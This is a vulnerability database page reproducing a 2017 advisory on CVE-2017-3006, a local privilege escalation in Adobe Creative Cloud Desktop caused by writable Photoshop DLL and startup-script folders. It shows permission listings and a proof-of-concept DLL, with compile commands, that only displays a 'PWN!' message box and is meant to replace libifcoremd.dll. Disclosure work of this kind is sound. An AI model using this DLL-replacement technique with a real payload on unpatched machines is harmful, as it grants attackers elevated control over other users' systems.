Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe Creative Cloud Desktop Application 4.0.0.185 Privilege Escalation Vulnerability

🗓️ 13 Apr 2017 00:00:00Reported by hyp3rlinxType 
zdt
 zdt🔗 0day.today👁 41 Views

Adobe Creative Cloud Desktop v4.0.0.185 Privilege Escalation Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		Adobe Creative Cloud Desktop < 4.0.0.185 Multiple Vulnerabilities (APSB17-13)
14 Apr 201700:00
nessus
Tenable Nessus		Adobe Creative Cloud < 4.0.0.185 Multiple Vulnerabilities (APSB17-13)
21 Oct 202400:00
nessus
Adobe		APSB17-13 Security update available for the Creative Cloud Desktop Application
11 Apr 201700:00
adobe
Circl		CVE-2017-3006
13 Apr 201700:00
circl
CNVD		Adobe Creatie Cloud Desktop Application Elevation of Privilege Vulnerability
12 Apr 201700:00
cnvd
CVE		CVE-2017-3006
12 Apr 201714:00
cve
Cvelist		CVE-2017-3006
12 Apr 201714:00
cvelist
Exploit DB		Adobe Creative Cloud Desktop Application &lt; 4.0.0.185 - Local Privilege Escalation
13 Apr 201700:00
exploitdb
exploitpack		Adobe Creative Cloud Desktop Application 4.0.0.185 - Local Privilege Escalation
13 Apr 201700:00
exploitpack
NVD		CVE-2017-3006
12 Apr 201714:59
nvd
Rows per page
[+] Credits: John Page aka hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/ADOBE-CREATIVE-CLOUD-PRIVILEGE-ESCALATION.txt
[+] ISR: apparitionSec



Vendor:
==============
www.adobe.com



Product:
========================================
Adobe Creative Cloud Desktop Application
<= v4.0.0.185 



Vulnerability Type:
=====================
Privilege Escalation



CVE Reference:
==============
CVE-2017-3006
APSB17-13


Vulnerability Details:
=====================
Adobe CC uses weak insecure permissions settings on the "Adobe Photoshop dll & Startup Scripts" directories. This may allow authenticated users
to execute arbitrary code in the security context of ANY other users with elevated privileges on the affected system. Issue is the 'C' flag
(Change) for 'Authenticated Users' group.


References:
============
https://helpx.adobe.com/security/products/creative-cloud/apsb17-13.html


e.g.

C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls>cacls * | more
C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls\libifcoremd.dll BUILTIN\Administrators:(ID)F
                                                                                NT AUTHORITY\SYSTEM:(ID)F
                                                                                BUILTIN\Users:(ID)R
                                                                                NT AUTHORITY\Authenticated Users:(ID)C

C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls\libmmd.dll BUILTIN\Administrators:(ID)F
                                                                           NT AUTHORITY\SYSTEM:(ID)F
                                                                           BUILTIN\Users:(ID)R
                                                                           NT AUTHORITY\Authenticated Users:(ID)C



C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls>ls -lt
total 2407
-rwxr-xr-x    1 Test     Administ   895184 Jun  3  2016 libifcoremd.dll
-rwxr-xr-x    1 Test     Administ  4033464 Jun  3  2016 libmmd.dll


///////////  AND /////////////////////


C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop>cacls * | more
C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop\photoshop BUILTIN\Administrators:(ID)F
                                                                                       BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                                                                       NT AUTHORITY\SYSTEM:(ID)F
                                                                                       NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                                                                       BUILTIN\Users:(OI)(CI)(ID)R
                                                                                       NT AUTHORITY\Authenticated Users:(ID)C
                                                                                       NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop\photoshop.jsx BUILTIN\Administrators:(ID)F
                                                                                           NT AUTHORITY\SYSTEM:(ID)F
                                                                                           BUILTIN\Users:(ID)R
                                                                                           NT AUTHORITY\Authenticated Users:(ID)C




Exploit/POC code(s):
====================
Compile below DLL 'C' code name it as "libifcoremd.dll"
Replace existing Adobe CC "libifcoremd.dll" file, wait for it to be referenced.


#include <windows.h>

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, NULL, "PWN!", MB_OK);  
    break;
  }
  return TRUE;
}


gcc -c libifcoremd.c
gcc -shared -o  libifcoremd.dll libifcoremd.o



Disclosure Timeline:
========================================
Vendor Notification: January 25, 2017
Vendor updates Adobe CC : April 11, 2017
April 12, 2017 : Public Disclosure

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Apr 2017 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.24109
adobecreative clouddesktop applicationprivilege escalationvulnerabilityweak permissionsauthenticated usersarbitrary codesecurity contextelevated privilegesdllstartup scripts
41